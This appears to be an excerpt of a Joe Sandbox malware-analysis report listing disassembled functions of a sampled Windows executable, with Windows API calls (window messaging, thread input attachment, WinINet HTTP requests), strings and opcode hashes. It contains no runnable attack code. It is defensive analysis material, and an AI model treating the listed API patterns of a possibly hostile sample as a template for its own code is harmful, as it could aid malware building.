                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00DAC869
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00DAC874
                                                                                                                  • GetParent.USER32 ref: 00DAC890
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DAC893
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00DAC89C
                                                                                                                  • GetParent.USER32(?), ref: 00DAC8B8
                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00DAC8BB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                  • Opcode ID: 832350fb69ed02bf616eba98afba96c09a25b800de853df5c3beb4c3c87acb6d
                                                                                                                  • Instruction ID: 6569841d497a5c9b81ddf61b260872ad909b0cea79aba9b19b08faa8b5986dd5
                                                                                                                  • Opcode Fuzzy Hash: 832350fb69ed02bf616eba98afba96c09a25b800de853df5c3beb4c3c87acb6d
                                                                                                                  • Instruction Fuzzy Hash: 1721AF71A00208BFDF01ABA4CC86EBEBBBAEF46311F148115F551E7291DB789815EB30
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32 ref: 00DAC8D9
                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00DAC8EE
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAC900
                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DAC97B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                  • Opcode ID: a718c58335bcd74b943795f0d9b8bd014a0e1c1f371964dd0448ede266b1d5ff
                                                                                                                  • Instruction ID: bb417ad933d5286170255a9af8510d505e6b98c4616eb40d4543fa613f619d93
                                                                                                                  • Opcode Fuzzy Hash: a718c58335bcd74b943795f0d9b8bd014a0e1c1f371964dd0448ede266b1d5ff
                                                                                                                  • Instruction Fuzzy Hash: 9711C67B658317B9FF142A34AC0ADA7779DDB07775B201016FA00F90D2FBA1A9118974
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00DBB137
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1725837607-0
                                                                                                                  • Opcode ID: 6fa41c2dbe520140eed4dc15d19835c2c6684ab84df8c84fe436ee35c89fdd75
                                                                                                                  • Instruction ID: b44648d2f36f482d1788479fd0a854a2e14232d00430c3b45f04e8fff00f18ad
                                                                                                                  • Opcode Fuzzy Hash: 6fa41c2dbe520140eed4dc15d19835c2c6684ab84df8c84fe436ee35c89fdd75
                                                                                                                  • Instruction Fuzzy Hash: A9C15875A0021ADFDB00DF98C481BEEB7F4EF09325F24406AE646E7341C7B0A941CBA0
                                                                                                                  APIs
                                                                                                                  • __lock.LIBCMT ref: 00D9BA74
                                                                                                                    • Part of subcall function 00D98984: __mtinitlocknum.LIBCMT ref: 00D98996
                                                                                                                    • Part of subcall function 00D98984: RtlEnterCriticalSection.NTDLL(00D90127), ref: 00D989AF
                                                                                                                  • __calloc_crt.LIBCMT ref: 00D9BA85
                                                                                                                    • Part of subcall function 00D97616: __calloc_impl.LIBCMT ref: 00D97625
                                                                                                                    • Part of subcall function 00D97616: Sleep.KERNEL32(00000000,?,00D90127,?,00D7125D,00000058,?,?), ref: 00D9763C
                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D9BAA0
                                                                                                                  • GetStartupInfoW.KERNEL32(?,00E26990,00000064,00D96B14,00E267D8,00000014), ref: 00D9BAF9
                                                                                                                  • __calloc_crt.LIBCMT ref: 00D9BB44
                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 00D9BB8B
                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00D9BBC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1426640281-0
                                                                                                                  • Opcode ID: d20603999a6fa9a6c98b19ecb51bdc6fb4ebc68698d0cd86f5059825488315b4
                                                                                                                  • Instruction ID: a707c3879fce5509ae7ebaf86f35be57c55205fbd1de0841501027b5bdb977e7
                                                                                                                  • Opcode Fuzzy Hash: d20603999a6fa9a6c98b19ecb51bdc6fb4ebc68698d0cd86f5059825488315b4
                                                                                                                  • Instruction Fuzzy Hash: FC81A2709057458FDF14CF68E9846A9BBF0EF45334B29825ED4A6AB3D1CB349802CB75
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00DB4A7D
                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4A91
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00DB4A98
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4AA7
                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB4AB9
                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4AD2
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4AE4
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4B29
                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4B3E
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4B49
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2156557900-0
                                                                                                                  • Opcode ID: 3050b14fa933d0ccab05a500232fc102eb161fdf6f6ed1fd80301202ff769afd
                                                                                                                  • Instruction ID: 9122b98096c3f998a2b17f7bf1ed9a7a301cde7d1e13bbb2d00ae18839ff6b05
                                                                                                                  • Opcode Fuzzy Hash: 3050b14fa933d0ccab05a500232fc102eb161fdf6f6ed1fd80301202ff769afd
                                                                                                                  • Instruction Fuzzy Hash: 35318471600308EFDB10DB66DC88FBA7BAAAB51712F188005FA06D7251D7B4EE44CB74
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?), ref: 00DEEC32
                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DEEC49
                                                                                                                  • GetWindowDC.USER32(?), ref: 00DEEC55
                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00DEEC64
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00DEEC76
                                                                                                                  • GetSysColor.USER32(00000005), ref: 00DEEC94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 272304278-0
                                                                                                                  • Opcode ID: 4ff7dd18428bb5af6f64bc9c0e43263e2487448ea57b80a99d5647744bedfadb
                                                                                                                  • Instruction ID: d30108b90573c45134fd84fa340e90171200744a2140308ecf876bfaf8e8f427
                                                                                                                  • Opcode Fuzzy Hash: 4ff7dd18428bb5af6f64bc9c0e43263e2487448ea57b80a99d5647744bedfadb
                                                                                                                  • Instruction Fuzzy Hash: 7D214A31500345AFDB21AB64EC48BA97B67EB05321F248225FA26E92E1CB314A41DF31
                                                                                                                  APIs
                                                                                                                  • EnumChildWindows.USER32(?,00DADD46), ref: 00DADC86
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                  • Opcode ID: 9920e3e717a7cb69d0081455910ae94c2377fc4c31f92eecdf5b6624fe02f6b8
                                                                                                                  • Instruction ID: 22478f591713592571297b1e06ce4bf6972dfd3934fd3dd577a159a4c1575eeb
                                                                                                                  • Opcode Fuzzy Hash: 9920e3e717a7cb69d0081455910ae94c2377fc4c31f92eecdf5b6624fe02f6b8
                                                                                                                  • Instruction Fuzzy Hash: F091B570900606EACB08EF64C481BEDFB76FF1A310F588519D89BA7591DF70A959CBB0
                                                                                                                  APIs
                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D745F0
                                                                                                                  • CoUninitialize.COMBASE ref: 00D74695
                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00D747BD
                                                                                                                  • DestroyWindow.USER32(?), ref: 00DE5936
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00DE599D
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DE59CA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                  • String ID: close all
                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                  • Opcode ID: 7402e337cb6fcdc2492c7c1a0c93a890dd7d0d0f0ddd975fbf168dca337ff10a
                                                                                                                  • Instruction ID: cbf463c70fedcb48a286f110d0116deaf43fbe90c00e46eb31693aa107df8065
                                                                                                                  • Opcode Fuzzy Hash: 7402e337cb6fcdc2492c7c1a0c93a890dd7d0d0f0ddd975fbf168dca337ff10a
                                                                                                                  • Instruction Fuzzy Hash: FB912E34600642CFC71AEF14D895BA9F3A4FF15704F5482A9E40EA7262EB30AD66CF74
                                                                                                                  APIs
                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00D8C2D2
                                                                                                                    • Part of subcall function 00D8C697: GetClientRect.USER32(?,?), ref: 00D8C6C0
                                                                                                                    • Part of subcall function 00D8C697: GetWindowRect.USER32(?,?), ref: 00D8C701
                                                                                                                    • Part of subcall function 00D8C697: ScreenToClient.USER32(?,?), ref: 00D8C729
                                                                                                                  • GetDC.USER32 ref: 00DEE006
                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DEE019
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00DEE027
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00DEE03C
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00DEE044
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DEE0CF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                  • String ID: U
                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                  • Opcode ID: 214f1b8753146ecd2f5d1edb11b754edddf38a36efecbfac6a36edcbdf511366
                                                                                                                  • Instruction ID: b749e5a8d352154b3ca8f6084a08b49621f07867cd7b3c1ec6aa99ce3221973b
                                                                                                                  • Opcode Fuzzy Hash: 214f1b8753146ecd2f5d1edb11b754edddf38a36efecbfac6a36edcbdf511366
                                                                                                                  • Instruction Fuzzy Hash: 7D71E331400288DFCF21EF65C884ABA7BB6FF49320F184269ED559A2A5C731CC41DB70
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DC4C5E
                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DC4C8A
                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00DC4CCC
                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DC4CE1
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC4CEE
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00DC4D1E
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00DC4D65
                                                                                                                    • Part of subcall function 00DC56A9: GetLastError.KERNEL32(?,?,00DC4A2B,00000000,00000000,00000001), ref: 00DC56BE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1241431887-3916222277
                                                                                                                  • Opcode ID: 97b4c11d46b6125b85bb64f16488faed5b90c4836072edbfb5367f39f57d8787
                                                                                                                  • Instruction ID: 48135305869397aa46c8103de7a564c8bf65ebbef04035c0d881460de26fda99
                                                                                                                  • Opcode Fuzzy Hash: 97b4c11d46b6125b85bb64f16488faed5b90c4836072edbfb5367f39f57d8787
                                                                                                                  • Instruction Fuzzy Hash: 2D417CB1501619BFEB12AF60DD95FFA77ADEF08314F14811AFA029B191D7B099448BB0
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E0DBF0), ref: 00DCBBA1
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E0DBF0), ref: 00DCBBD5
                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DCBD33
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00DCBD5D
                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DCBEAD
                                                                                                                  • ProgIDFromCLSID.COMBASE(?,?), ref: 00DCBEF7
                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00DCBF14
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 793797124-0
                                                                                                                  • Opcode ID: e81e5bc2520876bb6814d95fdd3d7286e14f495030f2aaebe7e15da177a18138
                                                                                                                  • Instruction ID: 82340a834af1a3ee0ef15042f4b463bbc3423d55f3ab9ddd86327b2d83f47859
                                                                                                                  • Opcode Fuzzy Hash: e81e5bc2520876bb6814d95fdd3d7286e14f495030f2aaebe7e15da177a18138
                                                                                                                  • Instruction Fuzzy Hash: 77F10B7590020AEFCB14DFA4C885EAEB7BAFF89715F148459F906AB250DB31ED41CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D749CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D74954,00000000), ref: 00D74A23
                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D8B85B), ref: 00D8B926
                                                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00D8B85B,00000000,?,?,00D8AF1E,?,?), ref: 00D8B9BD
                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00DEE775
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DEE7EB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2402799130-0
                                                                                                                  • Opcode ID: 7579b709acd7f2242898e3b028e1d41ab42f081c67469a6ec9a7b2b583740e27
                                                                                                                  • Instruction ID: c62c94751e64be40fc5e2d61ff91b3413a8c013b6f085935bbacec40608c3ea6
                                                                                                                  • Opcode Fuzzy Hash: 7579b709acd7f2242898e3b028e1d41ab42f081c67469a6ec9a7b2b583740e27
